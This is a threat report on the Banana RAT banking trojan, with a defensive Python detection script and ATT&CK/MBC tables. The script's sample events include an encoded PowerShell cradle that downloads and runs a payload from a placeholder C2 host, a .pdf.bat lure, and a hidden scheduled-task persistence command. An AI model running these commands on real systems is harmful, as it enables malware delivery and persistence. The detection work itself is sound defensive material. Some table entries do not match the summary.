EXECUTIVE SUMMARY:
A newly identified banking-focused remote access trojan, Banana RAT, has been observed in active campaigns attributed to the threat activity cluster SHADOW-WATER-063, targeting financial users through deceptive social engineering techniques. The malware is designed to impersonate legitimate documents and system notifications in order to trick victims into executing malicious files. Once deployed, it enables attackers to gain full control over infected systems, allowing them to monitor user activity and manipulate financial transactions in real time. The operation is primarily financially motivated and is structured to maximize stealth and fraud efficiency.
The malware operates through a multi-stage infection chain initiated by a disguised batch file delivered via phishing messages or fake document lures. Upon execution, a PowerShell-based loader retrieves an encrypted payload from a remote server and executes it entirely in memory, minimizing forensic traces on disk. The payload is heavily obfuscated using multiple encryption and packing layers, enabling it to evade signature-based detection. It establishes persistence through scheduled tasks and communicates with command-and-control infrastructure over encrypted channels. Once active, the trojan provides full remote access capabilities including live screen streaming, keyboard and mouse control, keylogging, clipboard manipulation, and browser session monitoring. It is also capable of detecting active banking sessions and deploying full-screen overlay attacks to impersonate financial institutions, while intercepting payment mechanisms such as QR-based transactions to redirect funds to attacker-controlled accounts.
Banana RAT represents a highly adaptive banking trojan that combines fileless execution, polymorphism, and remote access capabilities to conduct financial theft at scale. Its ability to maintain stealth while enabling full system compromise makes it a significant threat to banking users, particularly in environments where phishing resistance and endpoint monitoring are limited. Organizations and users are advised to strengthen phishing awareness, enforce endpoint detection mechanisms, and monitor for anomalous banking activity to mitigate such threats.
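Detection logic for the infection chain and the endpoint-monitoring advice above, as an added example that is not code from the original report or from the sources it cites. It assumes Sysmon-style process-creation fields (parent image, image, command line) and checks for the three stages the report describes: a document-lookalike batch file, a PowerShell loader that fetches and runs its payload in memory (plain or via an encoded command), and a scheduled task pointing at a script in a user-writable directory. Every sample event, path, task name, host name and URL is constructed for illustration.

```python
"""Process-telemetry rules for a Banana RAT-style infection chain.

Added example, not code from the original report or its referenced sources.
Assumes Sysmon-style process-creation fields (ParentImage, Image, CommandLine);
all sample events below are CONSTRUCTED, including paths, task name and URL.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Indicators the report describes: in-memory download/execute cradles, hidden
# windows, encoded commands, and script paths under user-writable directories.
CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"FromBase64String|Invoke-Expression|\bIEX\b)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)
ENCODED_ARG = re.compile(r"-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads)\\", re.IGNORECASE)
DOUBLE_EXT_BAT = re.compile(r"\.(pdf|docx?|xlsx?|xml|zip)\.bat\b", re.IGNORECASE)

# Constructed encoded command: built here so the sample shows what a '-Enc'
# loader blob looks like once decoded. The host name is a reserved placeholder.
_CRADLE_PS = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2')"
_ENCODED = base64.b64encode(_CRADLE_PS.encode("utf-16-le")).decode("ascii")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample telemetry: three events from the described chain plus two
# benign events (an interactive PowerShell session and a schtasks query).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", CMD,
                 r'cmd.exe /c "C:\Users\alice\Downloads\Invoice_2024.pdf.bat"'),
    ProcessEvent(CMD, PS, f"powershell.exe -NoP -W Hidden -Enc {_ENCODED}"),
    ProcessEvent(PS, r"C:\Windows\System32\schtasks.exe",
                 'schtasks.exe /Create /SC ONLOGON /TN "WindowsUpdateCheck" '
                 r'/TR "powershell.exe -W Hidden -File C:\Users\alice\AppData\Roaming\upd.ps1"'),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe Get-ChildItem C:\Projects"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /Query /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"'),
]


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand text (UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def evaluate(events):
    """Apply the three rules to each event; return [(rule_id, event_index, reason)]."""
    hits = []
    for i, ev in enumerate(events):
        img = ev.image.lower()
        cl = ev.command_line
        # BR-1: document-lookalike batch file launched from a user-writable location
        if img.endswith("cmd.exe") and DOUBLE_EXT_BAT.search(cl) and USER_WRITABLE.search(cl):
            hits.append(("BR-1", i, "double-extension .bat lure run via cmd.exe"))
        # BR-2: PowerShell with download/in-memory execution indicators, plain or encoded
        if img.endswith(("powershell.exe", "pwsh.exe")):
            decoded = decode_encoded_command(cl)
            if CRADLE.search(cl) or CRADLE.search(decoded):
                reasons = ["download cradle / in-memory execution"]
                if HIDDEN_WINDOW.search(cl):
                    reasons.append("hidden window")
                if decoded:
                    reasons.append("encoded command")
                if ev.parent_image.lower().endswith("cmd.exe"):
                    reasons.append("spawned by cmd.exe")
                hits.append(("BR-2", i, "; ".join(reasons)))
        # BR-3: scheduled task whose action runs PowerShell or a script in a user-writable path
        if img.endswith("schtasks.exe") and re.search(r"/create\b", cl, re.IGNORECASE):
            m = re.search(r'/tr\s+"?([^"]+)', cl, re.IGNORECASE)
            action = m.group(1) if m else ""
            if "powershell" in action.lower() or USER_WRITABLE.search(action):
                hits.append(("BR-3", i, "scheduled task action: " + action))
    return hits


if __name__ == "__main__":
    for rule, idx, reason in evaluate(SAMPLE_EVENTS):
        print(f"{rule} event#{idx}: {reason}")
```

Running the block prints one hit per malicious stage and nothing for the two benign events. The same fields are available from Windows Security event 4688 when command-line auditing is enabled, so the rules port directly; the `CRADLE` and `USER_WRITABLE` lists are starting points that should be tuned against an environment's own baseline of scripted administration to keep false positives down.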
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1204.002 | User Execution | Malicious File |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Stealth | T1027.002 | Obfuscated Files or Information | Software Packing |
| Stealth | T1055.002 | Process Injection | Portable Executable Injection |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Credential Access | T1539 | Steal Web Session Cookie | - |
| Collection | T1113 | Screen Capture | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1105 | Ingress Tool Transfer | - |
| Impact | T1565.002 | Data Manipulation | Transmitted Data Manipulation |
| Impact | T1496.001 | Resource Hijacking | Compute Hijacking |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
|---|---|---|
| Anti-Behavioral Analysis | B0001 | Debugger Detection |
| Anti-Behavioral Analysis | B0003 | Dynamic Analysis Evasion |
| Anti-Static Analysis | B0032 | Executable Code Obfuscation |
| Collection | E1113 | Screen Capture |
| Collection | F0002 | Keylogging |
| Collection | E1056 | Input Capture |
| Command and Control | B0030 | C2 Communication |
| Defense Evasion | B0025 | Conditional Execution |
| Defense Evasion | B0027 | Alternative Installation Location |
| Defense Evasion | B0040 | Covert Location |
| Defense Evasion | E1027 | Obfuscated Files or Information |
| Defense Evasion | F0001 | Software Packing |
| Defense Evasion | E1055 | Process Injection |
| Discovery | E1082 | System Information Discovery |
| Discovery | E1083 | File and Directory Discovery |
| Discovery | E1010 | Application Window Discovery |
| Execution | B0011 | Remote Commands |
| Execution | E1059 | Command and Scripting Interpreter |
| Impact | E1486 | Data Encrypted for Impact |
| Impact | B0022 | Remote Access |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Persistence | B0035 | Shutdown Event |
| Persistence | F0011 | Modify Existing Service |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/hackers-use-nf-e-invoice-lures/
https://www.trendmicro.com/en_us/research/26/e/banana-rat.html